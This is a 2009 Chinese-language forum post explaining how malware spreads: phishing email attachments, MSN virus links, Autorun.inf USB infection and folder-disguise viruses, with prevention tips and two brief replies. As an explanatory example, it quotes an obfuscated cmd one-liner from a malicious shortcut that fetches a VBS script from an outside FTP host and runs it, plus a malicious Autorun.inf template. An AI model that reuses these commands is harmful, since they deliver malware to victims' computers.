廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 4793 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
krichard2007
個人頭像
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x16 鮮花 x15
分享: 轉寄此文章 Facebook Plurk Twitter 版主評分 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
[資訊教學] 惡意程式之常見傳播方式
在這數位化的時代,
電腦越來越方便,
但是在這方便之中,
確隱藏著許多危機,
許多惡意成是被製造出來,
也一個比一個厲害,
其傳播方式也層出不窮,
以下為大家分享最近各惡意程式常見的傳播方式。

以下圖點擊可放大

(一)網路
1.利用電子郵件傳播
利用釣魚的方式,
引誘對方下載其附件並執行它。
在很久之前,木馬傳播者都以.exe .com .scr 等執行檔引誘別人
接著就進化出 xxxx.jpg.exe ~~等等引誘別人
或著是做成壓縮檔,
但是這樣很容易就被防毒抓到了,
現在又進化出,利用xxx.lnk捷徑 呼叫cmd.exe 利用FTP下載惡意程式,
且可以讓捷徑偽裝成圖檔,讓使用者認為是正常檔案,藉此降低使用者的戒心,
呼叫cmd.exe也可以利用set變數來躲過許多防毒軟體,
其代碼如下
%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

整理一下代碼(變數已還原):
cmd /c <=呼叫cmd命令提示字元
echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j <=讀取連接檔 下載t.vbs並執行下載 s.exe d.exe
echo start t.vbs>>j
ren j s.bat
call s.bat

預防方法:
不要隨意開啟別人用信箱寄過來的附件或連結,
開啟前要先詢問寄件者。

2.Yahoo即時通/MSN木馬連結
同樣的利用釣魚方式,
引誘使用者點擊或下載其惡意連結,
最近比較流行的是MSN病毒,
該病毒,如果中了,
只要你上了MSN就會自動對你的所有聯絡人發出帶有病毒連結的惡意訊息~~
Ex:
haha, your PIC?hxxp://ufopyrenees. org/images/view.php?=account@hotmail.com
以上是病毒網址請勿連結(已經過特殊處理)

預防方法:
不隨意開起來自MSN或及時通的可疑帶連結訊息。

(二)硬碟/外接式硬碟
1.透過Autorun.inf自動播放傳播...
此為傳統隨身碟病毒傳播的方式。
該病毒會在你的每個磁區寫入一個病毒主檔+一個Autorun.inf
利用系統硬碟自動播放的功能,
讓使用者開啟硬碟時,
不是開啟硬碟而是開啟病毒主檔,
以此方式入侵到你的系統。
Autorun.inf 的內容
大致上是
[AutoRun]
Open=XXX.EXE
Shell\Open\Command=XXX.EXE
Shell\Explore\Command=XXX.EXE

注:XXX.EXE為病毒執行檔 (副檔名可以是.bat .cmd .scr .pif .vbs 等可執行副檔名)
代表雙擊開啟磁碟會開啟XXX.EXE
對磁碟按右鍵開啟會開啟XXX.EXE
對磁碟按右鍵檔案總管會開啟XXX.EXE

檢測方式,
最簡單的方式,
利用WinRAR開啟你的外接式硬碟
檢查有沒有可疑的執行檔和AUTORUN.INF
例圖:


預防方法:
關閉自動播放
建議是下載安裝Microsoft釋出的補丁KB971029
http://support.micros...b/971029
關閉光碟機以外其他磁區的自動播放
並再妮的任何外接式硬碟跟目錄建立一個名為autorun.inf的資料夾~~

2.資料夾病毒
掉包你隨身碟跟目錄的資料夾,
建立假的偽裝資料夾執行檔,
引誘使用者點擊,
檢測方式,
用WinRAR開啟你的磁碟或外接式磁碟,
以下是使用 WinRAR 開啟被感染的隨身碟畫面~

被".exe"資料夾病毒感染的隨身碟...


被".scr"資料夾病毒感染的隨身碟...


被".lnk"(捷徑)資料夾病毒感染的隨身碟...


被"進階"檔案取代式資料夾病毒感染的隨身碟...


預防方式:
進到隨身碟裡面
按檢視 > 選擇 詳細資料


如果被別的電腦感染了,
請先暫時不要碰那些偽裝的資料夾,
可以下載FolderFix修復
http://www.wretch.cc/blog...5/15727032

3.檔案感染
感染所有磁區.exe可執行檔
預防方法建議存放於隨身碟中的EXE檔案,
都把他們壓縮起來,
這樣子可以減少隨身碟在外,受到別台電腦的感染。

以上為目前比較常見的惡意程式傳播方式~
如有不足的地方,歡迎大家提供。

也歡迎大家轉貼...
但是請注明出處唷~~

By K.Richard
http://www.wretch.cc/blog...5/15812444

此文章被評分,最近評分記錄
財富:100 (by upside) | 理由: 感謝提供 參考資料 數位男女因你而豐富



獻花 x2 回到頂端 [樓 主] From:歐洲 | Posted:2009-10-08 17:20 |
poan3
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x0 鮮花 x77
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

真的好毒。。

看不太懂 但也要謝謝 大大


祝福大家:新年快樂!事業高升!身体健康!萬事如意!~牛年行大運~新的一年財源滾滾來~!
獻花 x0 回到頂端 [1 樓] From:臺灣中華電信HINET | Posted:2009-10-08 22:46 |
liujenha 手機
數位造型
個人文章 個人相簿 個人日記 個人地圖
風雲人物
級別: 風雲人物 該用戶目前不上站
推文 x0 鮮花 x4768
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

真的是好毒呀


獻花 x0 回到頂端 [2 樓] From:臺灣中華HiNet | Posted:2009-10-09 07:21 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.016080 second(s),query:16 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言